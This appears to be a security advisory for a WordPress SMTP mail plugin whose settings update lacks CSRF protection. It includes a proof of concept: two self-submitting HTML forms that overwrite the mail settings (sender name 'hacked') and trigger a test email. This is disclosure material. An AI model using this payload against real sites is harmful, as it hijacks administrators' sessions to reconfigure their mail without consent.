The plugin does not have CSRF check in place when updating its settings, which could allow attackers to make a logged in admin change them via a CSRF attack
<form id="test" action="https://example.com/wp-admin/options-general.php?page=webriti_smtpmail_panels#" method="POST">
<input type="text" name="mail_from" value="[email protected]">
<input type="text" name="mail_from_name" value="hacked">
<input type="text" name="mailer" value="smtp">
<input type="text" name="smtp_host" value="localhost">
<input type="text" name="smtp_port" value="port">
<input type="text" name="smtp_ssl" value="ssl">
<input type="text" name="smtp_auth" value="true">
<input type="text" name="smtp_user" value="">
<input type="text" name="smtp_pass" value="">
<input type="text" name="option_submit" value="Änderungen speichern">
</form>
<script>
document.getElementById("test").submit();
</script>
<form id="test" action="https://example.com/wp-admin/options-general.php?page=webriti_smtpmail_panels#" method="POST">
<input type="text" name="webrit_to" value="[email protected]">
<input type="text" name="webrit_test_action" value="Send Test">
</form>
<script>
document.getElementById("test").submit();
</script>